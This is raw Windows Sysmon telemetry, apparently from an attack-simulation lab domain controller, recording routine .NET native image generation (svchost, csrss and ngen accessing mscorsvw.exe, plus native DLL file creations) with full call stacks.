13:46:09.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9121-6005-AA01-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.547{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9121-6005-AA01-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:09.547{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9121-6005-AA01-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9121-6005-A901-00000000A301}3804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.500{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9121-6005-A901-00000000A301}3804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.500{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9121-6005-A901-00000000A301}3804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:09.406{59A5CD1D-9120-6005-A801-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9bc-0\Microsoft.Build.Engine.dll2021-01-18 13:46:09.406 10341000x80000000000000005916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:10.094{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9122-6005-AC01-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:10.094{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9122-6005-AC01-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:10.094{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9122-6005-AC01-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:12.734{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9124-6005-AE01-00000000A301}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:12.734{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9124-6005-AE01-00000000A301}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:12.734{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9124-6005-AE01-00000000A301}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:12.672{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9124-6005-AD01-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:12.672{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9124-6005-AD01-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:12.672{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9124-6005-AD01-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:12.531{59A5CD1D-9122-6005-AC01-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11a0-0\Microsoft.Build.Tasks.v4.0.dll2021-01-18 13:46:12.531 10341000x80000000000000005936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:13.968{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9125-6005-B201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.953{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9125-6005-B201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:13.953{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9125-6005-B201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:13.578{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9125-6005-B101-00000000A301}4300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.562{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9125-6005-B101-00000000A301}4300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:13.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9125-6005-B101-00000000A301}4300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:13.500{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9125-6005-B001-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.484{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9125-6005-B001-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:13.484{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9125-6005-B001-00000000A301}4636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
